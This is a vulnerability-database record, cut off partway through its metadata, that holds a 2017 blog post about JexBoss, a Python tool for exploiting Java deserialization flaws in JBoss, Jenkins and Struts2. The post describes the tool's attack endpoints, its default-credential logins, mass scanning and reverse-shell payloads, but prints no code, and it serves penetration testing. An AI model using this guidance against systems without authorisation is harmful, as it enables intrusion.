DATABASE RESOURCES PRICING ABOUT US

{"id": "PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B", "vendorId": null, "type": "pentestit", "bulletinFamily": "blog", "title": "JexBoss: Java Deserialization Verification & EXploitation Tool!", "description": "PenTestIT RSS Feed\n\nI was working with a customers Red Hat JBoss server today and wanted to test for affected deserialization vulnerabilities. Though my favourite go-to tool - the Burp Suite has many extensions, I wanted to try something that I had not before. That's when I stumbled across **JexBoss**, which turned out to be a pretty decent [open source](<http://pentestit.com/tag/open-source/>) tool. I think _JexBoss_ is a play on Java EXploitation like a Boss wording.\n\n\n\n## What is JexBoss?\n\nJexBoss is an open source tool in Python to help you exploit and verify Java and Red Hat JBoss deserialization vulnerabilities. As we all know, serialization converts and objects state to a byte stream so that a copy of the same object can be obtained by reverting the byte stream itself. Presumably, to deserialize is to reverse serialization, ie. taking the serialized data to rebuild it into the original object. This problem is trivial in Java as there are no checks on the classes that can be deserialized.\n\n## Features of JexBoss:\n\nThe tool and exploits were developed and tested for:\n\n * JBoss Application Server versions: 3, 4, 5 and 6.\n * Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), DNS gadget, Remote JMX (CVE-2016-3427, CVE-2016-8735), Apache Struts2 Jakarta Multipart parser CVE-2017-5638, etc.)\n * Supported exploitation vectors are: \n * /_admin-console_: Tested and working in JBoss versions 5 and 6.\n * /_jmx-console_: Tested and working in JBoss versions 4, 5 and 6.\n * /_jmx-console_/_HtmlAdaptor_: Tested and working in JBoss versions 4, 5 and 6.\n * /_web-console_/_Invoker_: Tested and working in JBoss versions 4, 5 and 6.\n * /_invoker_/_JMXInvokerServlet_: Tested and working in JBoss versions 4, 5 and 6.\n * Application Deserialization: Tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters.\n * Servlet Deserialization: Tested and working against multiple java applications, platforms, etc, via servlets that process serialized objects.\n * Apache Struts2 Jakarta Multipart ([CVE-2017-5638](<http://pentestit.com/tag/CVE-2017-5638/>)): Tested against Apache Struts 2 applications.\n * Tries to authenticate to /_admin-console_/_login.seam_ using default user name and password - admin:admin.\n * Sends exploits with proper headers alternating with random User-Agent string.\n * Proxy support.\n * Auto scan and file scan modes.\n\nWith the auto scan and file scan modes, you can leverage this tool to launch a mass-scan against your own network in a short duration of time. Additionally, a payload also allows you to gain access to a reverse shell with Metasploit meterpreter support. Another good news is that it JexBoss is Python 2 &amp; Python 3 compatible. It also includes an auto-updater.\n\n## Download JexBoss:\n\nAs always, the current version - JexBoss version 1.2.4 - can be obtained by checking out the GIT repository from [**here**](<https://github.com/joaomatosf/jexboss>).\n\nThe post [JexBoss: Java Deserialization Verification &amp; EXploitation Tool!](<http://pentestit.com/jexboss-java-deserialization-verification-exploitation-tool/>) appeared first on [PenTestIT](<http://pentestit.com>).", "published": "2017-08-11T06:52:45", "modified": "2017-08-11T06:52:45", "epss": [{"cve": "CVE-2015-5317", "epss": 0.04876, "percentile": 0.91923, "modified": "2023-11-24"}, {"cve": "CVE-2016-3427", "epss": 0.07811, "percentile": 0.93531, "modified": "2023-11-24"}, {"cve": "CVE-2016-8735", "epss": 0.28653, "percentile": 0.96381, "modified": "2023-11-24"}, {"cve": "CVE-2017-5638", "epss": 0.97536, "percentile": 0.99992, "modified": "2023-11-24"}], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "http://pentestit.com/jexboss-java-deserialization-verification-exploitation-tool/", "reporter": "Black", "references": [], "cvelist": ["CVE-2015-5317", "CVE-2016-3427", "CVE-2016-8735", "CVE-2017-5638"], "immutableFields": [], "lastseen": "2017-08-11T08:07:48", "viewCount": 4381, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "aix", "idList": ["JAVA_APRIL2016_ADVISORY.ASC"]}, {"type": "amazon", "idList": ["ALAS-2016-688", "ALAS-2016-693", "ALAS-2016-700", "ALAS-2016-776", "ALAS-2016-777", "ALAS-2016-778"]}, {"type": "archlinux", "idList": ["ASA-201511-11", "ASA-201611-22"]}, {"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879", "ATLASSIAN:JRASERVER-65102", "BAM-18242", "CWD-4879", "JRASERVER-65102"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "AKB:C3CF0D9C-F7A6-43C6-802E-F6894C586B9A", "AKB:D91AE5D0-67DF-4E98-925D-B730FC5F2045", "AKB:EB419F1B-B3C6-4300-B170-275E56122407"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "centos", "idList": ["CESA-2016:0650", "CESA-2016:0651", "CESA-2016:0675", "CESA-2016:0676", "CESA-2016:0723"]}, {"type": "cert", "idList": ["VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2016-0968", "CPAI-2017-0197", "CPAI-2017-0676"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2015-5317", "CISA-KEV-CVE-2016-3427", "CISA-KEV-CVE-2016-8735", "CISA-KEV-CVE-2017-5638"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2015-5317", "CVE-2016-3427", "CVE-2016-8735", "CVE-2017-5638"]}, {"type": "debian", "idList": ["DEBIAN:DLA-451-1:707F7", "DEBIAN:DLA-728-1:A9D65", "DEBIAN:DLA-728-1:ECD0E", "DEBIAN:DLA-729-1:1B0B9", "DEBIAN:DLA-729-1:E931B", "DEBIAN:DSA-3558-1:5D79E", "DEBIAN:DSA-3738-1:66970", "DEBIAN:DSA-3738-1:EB221", "DEBIAN:DSA-3739-1:06429", "DEBIAN:DSA-3739-1:1BDAB"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-3427", "DEBIANCVE:CVE-2016-8735"]}, {"type": "f5", "idList": ["F5:K43451236", "F5:K49820145", "F5:K73112451", "SOL49820145", "SOL73112451"]}, {"type": "fedora", "idList": ["FEDORA:125286087B00", "FEDORA:1DA54604D2A3", "FEDORA:8CEB2616D980", "FEDORA:A8277604E831", "FEDORA:B03C26051DFB", "FEDORA:B4ED260875C6"]}, {"type": "freebsd", "idList": ["0B9AF110-D529-11E6-AE1B-002590263BF5"]}, {"type": "gentoo", "idList": ["GLSA-201606-18"]}, {"type": "github", "idList": ["GHSA-J77Q-2QQG-6989", "GITHUB:0519EA92487B44F364A1B35C85049455", "GITHUB:C82C4FE9D1A6B81D79D6EF10C4F9D007"]}, {"type": "hackerone", "idList": ["H1:212022", "H1:212985", "H1:213069"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["02304D05D897B568E77C8953094F5914F389089362655D2AB68B096E3F3418DC", "025E2CD6F9F010517E9E17E8AC66A53012D7F2D3765B567272ACF4ED02426647", "029AA49A507A723A5E4C56429FB5A19F84FFBFB3D81F702E5C7D95F238C49FAF", "0766EE3C620AAAF614D24B4B93352C6C94F10148776C7854787A45858D29E32F", "07DBE9517A4611E5419E1606D2F71A8201613E4042A34EE495FE116635651800", "0A188938BB57625255598B9B581375E3C99A86BB3F15E48ED8315B0895EAF89D", "0AEC3ABCCFB562437ED4141670F5C7C6E096FEFB11D3045A28046C82B784AD9E", "0C4F91C9AA7E146EDA1AA877B92C4C590E445AC7D2AC0E60ECCE4BA77A47F0EB", "0D0755F0269505405CB64BD65BD409DF7890B56244501D37813BE723F406D6C1", "0E275DB0879F2F3FE93DB95B54E59F113110390231355F64AD1605244203F94C", "1589B4745F310D5E19839D029CFF7AA2E7CE499911AB5E7A7A0995F367A8F990", "1BFF63EB8AF39056E08427B06D34E43B32E43FBCC74FB2A85F32E708984FD60F", "21814730A396F5E3C91B95B6F895601A0824D3A6D8E235F7EFBA63C853BE3563", "265C7F39696063EC6C052A835129BE2250A30FFCD1A9F5A46A6025E12F1AEC5A", "2E9BC1AFBA9F34E20E313BA5B8B5B6C1AEEC0E8F6EC0B353125AA17460789A62", "2EBE18E6BFBAB729289EB191B100C4B2DB254A6249E2A51851B4C72069DDA2FF", "2F849754C32CC7E1EC23ADD90E35A80C3A3A4B7890DAD95ADA048C88D062115A", "300B30B77E64A29C8B399F8C62E9F501F6C76F9367F47CB2AECB5124ADBB7048", "30B97F976830F38EC78A601AC4AF08E5E915E3601910C6A37C3824A2F36E31B8", "3352ECB45B78D0B42C884136DC8EEAB3DFA07BBC5F0040DCA087FF7BC4435447", "342276C20A5C5FDDDF8726F4B0773A53244224965A0AE1BE83CE2A30F753D938", "3595219827CBAE62E6C87140158C93E3FA2A013C8BCEC8A5B536BAC89C55BC21", "3685A36D136086CBDF1C072E6BE9AD83DCB1C185CE82F5183E3DE098D0CF7921", "391849D137C8AE4FB53B4FC5E1B3F8D0BCDD416F030E276A01FE226C2BE1B6BA", "39386BB32C57BB1B41EB54F0E3BBD3ECD3E1A6BE6C64795EC5DC2969E728D80F", "3B175B8B601A430DE67B3C46FDC9F27CED4587673E54755AD2690781ED1CB235", "3C13E1626546AB19B54BC13C855DB4A4A72EDBD9013028CD74215F23DDA82984", "3C67CAAA7F30B6812F7E9BDAD360C818D08704D065BB87A725B5C752904516A9", "3DF5A1EC8EEA23B1128F84C6374971EA3815E1F8281F849F3593423BB347D925", "3E52F30DE645ED79947372BF790D5DAB4B5FA29866C26DA53811D62A4E0B3206", "411DE209066A00259E38D292C22264C2EDA3B961B523920D589433F42FB534BC", "418A4C8D1E8F2E8A923DFE2C36570B4A5EF7B515E050C0F19513AF3DAE7D2628", "435516AF6D5C3AA4A41E050752C520D87248D73515C5F8742AB46F7FEAE2E9A4", "45B8083C191232F81D36077A9DB997569CBCDF51915A12038301F1630F4EE215", "471FC6DCFC7216154A057D59B759EF42BEB095C5F6F09974870FD1E5968AC39A", "4733D43646C8A9049B8454CA406366CE2D5051464AA128020F19F4299F6FC6E4", "48F6A099D2817EC515107FFC49C4E17438FAC35AB50A0F0C6F0B86E2F20FECE3", "4D0056EC4D5672FF48E356CFCC82780C64C9FB240D745F2F627F178D9CF22F0C", "4E95B5EB959CBE5490B90287812FD445A690A3158E83D37882EADCE4A7BCD44F", "51AB1F7F50AE2546674F97D246115890E30F6672B86D6D523810D29C5BAE0D62", "5281637484F76A0F64AF63C7B85C8EF529B52AD9676E8EABE3AB850E14B04D98", "52BCF84201CEBA012FEF5D806CBEB019BE40DA44E167DE103878B677EE8CAFAB", "546F05697B8F700EEF28B598121A8A3351E168124EB0852E39278EAE7A99C11B", "5E90705663750F9AAC65B53F188110D6CF86356EBD6A0890270ADE925BFCD638", "5F3A2E75CBD34F2D760C7DAE0148B354CA04A0288478AD25F8ED498DB635196E", "5F7C53205F3C1DF73818472F4A9E6151FAF5B6BEA01F0D749018E0315B401DAE", "63348F566FADDD53F743F6728812719200000602FE07DC239E5916DE25B8BFFE", "6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "64DD46BD08D899DF176194BC3B565D436438971A0D7BEC33DB449C0B7DBDB5B6", "6D6FD3B17FF4E3AEC7C3300A59DF811D1AEFB71253A1B03A9B6D6569C666112F", "6E10F95EC3209DC93A3215EDD3E09828D356327BBCFCB364CB9408C9804A6F8E", "6F9B3E5D97FDBB41059AA8C4DDC3F8C6E337642756FF537C16A61C7599D523B9", "71763DB8BA3B87C5175E4ED1BF88B5F20D4D7107BB02006612C8229371E7C9F4", "75C8D2E2467315AEBB99E354E2DB2EE058EBC8CD1C3ACE162A19DF807E6B2876", "7996A5B21090888A5E92985E9AA52C1DFFD5B468A73A1B32557A0A11DFBE0724", "7AE8462B1ED6BC7CB18D0E602A33B224072317EEACEC3938F0976678B0C95AD4", "7D29B4909C6BF3ADF472798B711970B396D8FD474F784096D0CD51E0C3DE6E56", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D", "83C6825053110170B6E18DA8CE101AC7FA6B1A5EC5BE80DB952A19C36C94C4AB", "84CC191C6FF7D7F095AAC167AD676E34BADFF5788D009121FE195F8179866081", "88059994BDF023078EC1A0894C156708EBE6348CEBD9AE468DB229EA67B1E1FA", "8B5016D64A8BBF10B52DDF15458908578A8F9418D5076DA06FD0081F472F9FAA", "8CF3082A44DE60C67D8DC18C23EE26D771B4A91C0A12FDF0AA3BEC56135A0739", "9A135CF5F1DD70B64FF2E55C6A7E52F7C3A64DEEFDD86F45910661C5A67617D8", "9B76461F148C75BB1672D4E6CDC2D3BAB8D5A3142F9FF56BF418C9B0F91B19DF", "9C3CAFB5742400AAC9286EB9089506FEA84581BB4A12DAB6BB996F50EB47E45E", "9CD14117A91708D3923BD78C3B0E27E442D14B8976544CB69E7166B29DBCC7C9", "A5022E2B14C6CFC69E613237E07A6681EAB204D56E5668D8588C0AE424BB40D9", "A54D5DA424A230A6C4C61FA58EB1A69719615CD1E841D07FDB1CEC9FE4659E45", "A801B8C1EF0F6A4D59E8093D234C394269007D65A6E868D0FD1895AE417608B1", "AAA4733E548388B933C5FBCDCA4EFEA642E359C79EA119CE1225DE33E6D4A575", "AB8332BB49251697A40C4A181070CC821286458CE2114BD526688971705EBC0B", "ACF0F1F92955D253FE8D9A17FABBDE19665D165C1026886A0612F8B6186AA5A2", "AFAF169974B6AABF6CF7272D4406CAB1EDD15D52DAF28E97FB52D795BB07F8D1", "B0917B9B05986D5C57AFA7D61D59DB3AC46BF8A66810DCCC331CD59E3A0CC975", "B4C8559B2D36E25ABE9FBA0A4F587138E22094E71DD07485714AE1D179A84333", "B73E2AC64919358B53CBFE9E0576F144ECF05CB1E42E5E59DCDDEF0BD5FEF485", "B8D7C45A7B91FC54907F2A1A1E6B04BDAFBFDF653C7180AD40F4BA7A5091A75B", "B9410A108CEB6D3C9DFE0C1617FB34D181E021D243C3FB7F5DB35969D7C4CE52", "BC89FD795C8D2727ED36F68D3C0CB562583E29BA6F46C7C0230E9FDCF5110D99", "C0F8A4FDB16B6060757282B298924E8005EF0D1B30BB3472B793362E6109A282", "C3FB79ADA39B46791DCF93E4A2B6E50FE2792D0E382EF08036106CE4972770C2", "C4A25CF6BA3F6E71753F4E3FF5296DCAEA56B938BAE00EF5CB5BBAB12BD4FE3F", "C6A6ABECADB0A1B202F572A8F947AF9F8E55FD674DB366EDEFD2EC2DD4BCE5B7", "C9A06C4BC1ACE55A17C7DD2D9DD98AA6FDEE59C9586CAFC2375754D88139C6F2", "CE0E774D280D0A9EA8834062B059FA20181F271D6A07DE4FB444EC479DE07233", "D0DCF925CB843A3DD1CE13BFFE3A9D0AA7622AA1DBECD77AB5105922400050DA", "D28A33DD6F9F0616BF17BE9435C16BA5747AE3606D1B535CC4C8068BCF7BF4EB", "D2E48469AB3A6F2B1FEAEFDF00F68B8BC2F210C7E3BBABA5556DFDE4C6DB7ECD", "D3401CFFC13C94FF7D2FF5A22BBC41148B332C1541709016F3DE5E29E9CD7150", "D4C1C0E6A5170ECC8C7B3DFFE304FF401A904E8D9E1A70A203081EBBCDBE568F", "D769235D102AD19A73D51C968FFD8889D9656A19C29D4BE9C66233A668FC8B7A", "D86489221457B61FCC95E41FD2271EB756D72E51AED6BEEA73DF5EA02691AB18", "DA78D22BE98AAE3FAE7595498C22303F728B4F1A787F6AA2950D1A2B51579024", "DD2F47B9C661B3BFC13D692487D2B3B267C19A65B8A7DA475BBA8E20873399E0", "DE915924CF7F2670B1FFCDF6498DBB124F4087216A8B4D38EBCEE133912CE5E2", "E026D876441506065638E9669757F49A62954ECA499F837804AD1070CA5C7B19", "E095FC03096261FE55986EF4F402EA0A700BEE11F22BFA669379C13D2E1BC33B", "E19B380C2BF0F26DFDCBADD37C1B7D4A13ED463E7B4B4ECE7EEEC8895D5690CB", "E53C0B021C3B3F6C772C766061FE50D2491235944C75F752C4EF2C3047351511", "E568EF1AEDF71160C521687EEF39BAD4E7E38A89F906FA2D8B03A2FB9255CCC7", "E779812945D461E2AC5804611B54C4A491B1E4005572A27425DFC928CBC9BFC3", "EC04C84423EE0C4E734038A3305029BA46FF47C7662107F5FFC07C3ACF2F1F61", "F1072FE090DABD963C764C2E009454B24AB02021B54C8519F4195C5ABC6E2FF5", "F35F5FE0DA298C18416599A44F6A3AC496F0F4FEC9098F354459A1FB95F4A01E"]}, {"type": "ics", "idList": ["AA20-133A"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:CD196CDD794CCCE3719A9D38DA5BE417", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:4611207874033525364", "KITPLOIT:5052987141331551837", "KITPLOIT:5230099254245458698", "KITPLOIT:5420210148456420402", "KITPLOIT:7013881512724945934", "KITPLOIT:7314019160937441300", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-APACHE-STRUTS-OPEN-SOURCE-FRAMEWORK-REMOTE-CODE-EXECUTION-NOSID", "LENOVO:PS500093-NOSID"]}, {"type": "mageia", "idList": ["MGASA-2016-0149", "MGASA-2016-0417"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201681747", "MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379", "MYHACK58:62201786819", "MYHACK58:62201890758", "MYHACK58:62201891264", "MYHACK58:62201993410"]}, {"type": "nessus", "idList": ["700055.PRM", "700668.PASL", "9448.PRM", "9906.PASL", "ACTIVEMQ_5_15_5.NASL", "AIX_JAVA_APRIL2016_ADVISORY.NASL", "ALA_ALAS-2016-688.NASL", "ALA_ALAS-2016-693.NASL", "ALA_ALAS-2016-700.NASL", "ALA_ALAS-2016-776.NASL", "ALA_ALAS-2016-777.NASL", "ALA_ALAS-2016-778.NASL", "CENTOS_RHSA-2016-0650.NASL", "CENTOS_RHSA-2016-0651.NASL", "CENTOS_RHSA-2016-0675.NASL", "CENTOS_RHSA-2016-0676.NASL", "CENTOS_RHSA-2016-0723.NASL", "DEBIAN_DLA-451.NASL", "DEBIAN_DLA-728.NASL", "DEBIAN_DLA-729.NASL", "DEBIAN_DSA-3558.NASL", "DEBIAN_DSA-3738.NASL", "DEBIAN_DSA-3739.NASL", "EULEROS_SA-2016-1015.NASL", "F5_BIGIP_SOL73112451.NASL", "FEDORA_2015-89468612F5.NASL", "FEDORA_2015-D02FEEBD15.NASL", "FEDORA_2016-98CCA07999.NASL", "FEDORA_2016-9C33466FBB.NASL", "FEDORA_2016-A98C560116.NASL", "FREEBSD_PKG_0B9AF110D52911E6AE1B002590263BF5.NASL", "GENTOO_GLSA-201606-18.NASL", "IBM_JAVA_2016_04_19.NASL", "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "OPENSUSE-2016-1455.NASL", "OPENSUSE-2016-1456.NASL", "OPENSUSE-2016-553.NASL", "OPENSUSE-2016-554.NASL", "OPENSUSE-2016-560.NASL", "OPENSUSE-2016-572.NASL", "OPENSUSE-2016-573.NASL", "ORACLELINUX_ELSA-2016-0650.NASL", "ORACLELINUX_ELSA-2016-0651.NASL", "ORACLELINUX_ELSA-2016-0675.NASL", "ORACLELINUX_ELSA-2016-0676.NASL", "ORACLELINUX_ELSA-2016-0723.NASL", "ORACLE_JAVA_CPU_APR_2016.NASL", "ORACLE_JAVA_CPU_APR_2016_UNIX.NASL", "ORACLE_JROCKIT_CPU_APR_2016.NASL", "ORACLE_RDBMS_CPU_OCT_2017.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_APR_2017_CPU.NASL", "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CVE-2017-9805.NBIN", "REDHAT-RHSA-2016-0070.NASL", "REDHAT-RHSA-2016-0489.NASL", "REDHAT-RHSA-2016-0650.NASL", "REDHAT-RHSA-2016-0651.NASL", "REDHAT-RHSA-2016-0675.NASL", "REDHAT-RHSA-2016-0676.NASL", "REDHAT-RHSA-2016-0677.NASL", "REDHAT-RHSA-2016-0678.NASL", "REDHAT-RHSA-2016-0679.NASL", "REDHAT-RHSA-2016-0701.NASL", "REDHAT-RHSA-2016-0702.NASL", "REDHAT-RHSA-2016-0708.NASL", "REDHAT-RHSA-2016-0716.NASL", "REDHAT-RHSA-2016-0723.NASL", "REDHAT-RHSA-2016-1039.NASL", "REDHAT-RHSA-2016-1430.NASL", "REDHAT-RHSA-2017-0455.NASL", "REDHAT-RHSA-2017-0456.NASL", "REDHAT-RHSA-2017-1216.NASL", "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "SL_20160420_JAVA_1_8_0_OPENJDK_ON_SL6_X.NASL", "SL_20160420_JAVA_1_8_0_OPENJDK_ON_SL7_X.NASL", "SL_20160421_JAVA_1_7_0_OPENJDK_ON_SL5_X.NASL", "SL_20160421_JAVA_1_7_0_OPENJDK_ON_SL6_X.NASL", "SL_20160509_JAVA_1_6_0_OPENJDK_ON_SL5_X.NASL", "STRUTS_2_5_10_1_RCE.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "SUSE_SU-2016-1248-1.NASL", "SUSE_SU-2016-1250-1.NASL", "SUSE_SU-2016-1299-1.NASL", "SUSE_SU-2016-1300-1.NASL", "SUSE_SU-2016-1303-1.NASL", "SUSE_SU-2016-1378-1.NASL", "SUSE_SU-2016-1379-1.NASL", "SUSE_SU-2016-1388-1.NASL", "TOMCAT_8_5_8.NASL", "UBUNTU_USN-2963-1.NASL", "UBUNTU_USN-2964-1.NASL", "UBUNTU_USN-2972-1.NASL", "UBUNTU_USN-3177-1.NASL", "UBUNTU_USN-3177-2.NASL", "UBUNTU_USN-4557-1.NASL", "VMWARE_VCENTER_VMSA-2016-0005.NASL", "VMWARE_VCLOUD_DIRECTOR_VMSA-2016-0005.NASL", "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA_2016_0005.NASL", "VMWARE_VSPHERE_REPLICATION_VMSA_2016_0005.NASL", "WEBSPHERE_MQ_SWG21982566.NASL"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2017-5638.NSE"]}, {"type": "nuclei", "idList": ["NUCLEI:CVE-2017-5638"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105731", "OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310108388", "OPENVAS:1361412562310108771", "OPENVAS:1361412562310120678", "OPENVAS:1361412562310120682", "OPENVAS:1361412562310120689", "OPENVAS:1361412562310122934", "OPENVAS:1361412562310122935", "OPENVAS:1361412562310122936", "OPENVAS:1361412562310122937", "OPENVAS:1361412562310131300", "OPENVAS:1361412562310140180", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310703558", "OPENVAS:1361412562310703738", "OPENVAS:1361412562310703739", "OPENVAS:1361412562310806920", "OPENVAS:1361412562310807001", "OPENVAS:1361412562310807551", "OPENVAS:1361412562310808269", "OPENVAS:1361412562310810748", "OPENVAS:1361412562310810966", "OPENVAS:1361412562310811244", "OPENVAS:1361412562310811871", "OPENVAS:1361412562310842733", "OPENVAS:1361412562310842745", "OPENVAS:1361412562310842764", "OPENVAS:1361412562310843024", "OPENVAS:1361412562310843035", "OPENVAS:1361412562310851291", "OPENVAS:1361412562310851292", "OPENVAS:1361412562310851293", "OPENVAS:1361412562310851302", "OPENVAS:1361412562310851303", "OPENVAS:1361412562310851306", "OPENVAS:1361412562310851311", "OPENVAS:1361412562310851455", "OPENVAS:1361412562310851503", "OPENVAS:1361412562310871598", "OPENVAS:1361412562310871599", "OPENVAS:1361412562310871600", "OPENVAS:1361412562310871601", "OPENVAS:1361412562310871608", "OPENVAS:1361412562310872149", "OPENVAS:1361412562310872150", "OPENVAS:1361412562310872157", "OPENVAS:1361412562310882467", "OPENVAS:1361412562310882468", "OPENVAS:1361412562310882469", "OPENVAS:1361412562310882470", "OPENVAS:1361412562310882471", "OPENVAS:1361412562310882485", "OPENVAS:1361412562310882487", "OPENVAS:1361412562310882488", "OPENVAS:1361412562311220161015", "OPENVAS:703558", "OPENVAS:703738", "OPENVAS:703739"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2016V3", "ORACLE:CPUAPR2017", "ORACLE:CPUAPR2019", "ORACLE:CPUJAN2018", "ORACLE:CPUJUL2017", "ORACLE:CPUJUL2018", "ORACLE:CPUJUL2019", "ORACLE:CPUOCT2017"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-0650", "ELSA-2016-0651", "ELSA-2016-0675", "ELSA-2016-0676", "ELSA-2016-0723"]}, {"type": "osv", "idList": ["OSV:DLA-728-1", "OSV:DLA-729-1", "OSV:DSA-3558-1", "OSV:GHSA-J77Q-2QQG-6989"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630"]}, {"type": "pentestit", "idList": ["PENTESTIT:F5DFB26B34C75683830E664CBD58178F"]}, {"type": "prion", "idList": ["PRION:CVE-2015-5317", "PRION:CVE-2016-3427", "PRION:CVE-2016-8735", "PRION:CVE-2017-5638"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED", "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "QUALYSBLOG:5C311FA52DD78D7015076D492F321DB0", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:AB2325C5FBED5CF55517445600D470C1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhat", "idList": ["RHSA-2016:0070", "RHSA-2016:0489", "RHSA-2016:0650", "RHSA-2016:0651", "RHSA-2016:0675", "RHSA-2016:0676", "RHSA-2016:0677", "RHSA-2016:0678", "RHSA-2016:0679", "RHSA-2016:0701", "RHSA-2016:0702", "RHSA-2016:0708", "RHSA-2016:0716", "RHSA-2016:0723", "RHSA-2016:1039", "RHSA-2016:1430", "RHSA-2016:22381", "RHSA-2017:0455", "RHSA-2017:0456", "RHSA-2017:0457", "RHSA-2017:1216"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-8735", "RH:CVE-2017-5638"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:484D58D595B8F6CEE787306160971308", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "seebug", "idList": ["SSV:92553", "SSV:92746", "SSV:92804"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:1222-1", "OPENSUSE-SU-2016:1230-1", "OPENSUSE-SU-2016:1235-1", "OPENSUSE-SU-2016:1262-1", "OPENSUSE-SU-2016:1265-1", "OPENSUSE-SU-2016:3129-1", "OPENSUSE-SU-2016:3144-1", "SUSE-SU-2016:1248-1", "SUSE-SU-2016:1250-1", "SUSE-SU-2016:1299-1", "SUSE-SU-2016:1300-1", "SUSE-SU-2016:1303-1", "SUSE-SU-2016:1378-1", "SUSE-SU-2016:1379-1", "SUSE-SU-2016:1388-1", "SUSE-SU-2016:1458-1", "SUSE-SU-2016:1475-1", "SUSE-SU-2016:3079-1", "SUSE-SU-2016:3081-1", "SUSE-SU-2017:1632-1", "SUSE-SU-2017:1660-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:991CC85C1D7CC3CD70110C7FAE123FAC", "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3E5F28AD1BE3C9B2442EA318E6E13E5C", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:7FD924637D99697D78D53283817508DA", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:ACD3479531482E2CA5A8E15EB6B47523", "THN:AF93AEDBDE6169AD1163D53979A4EA04"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", 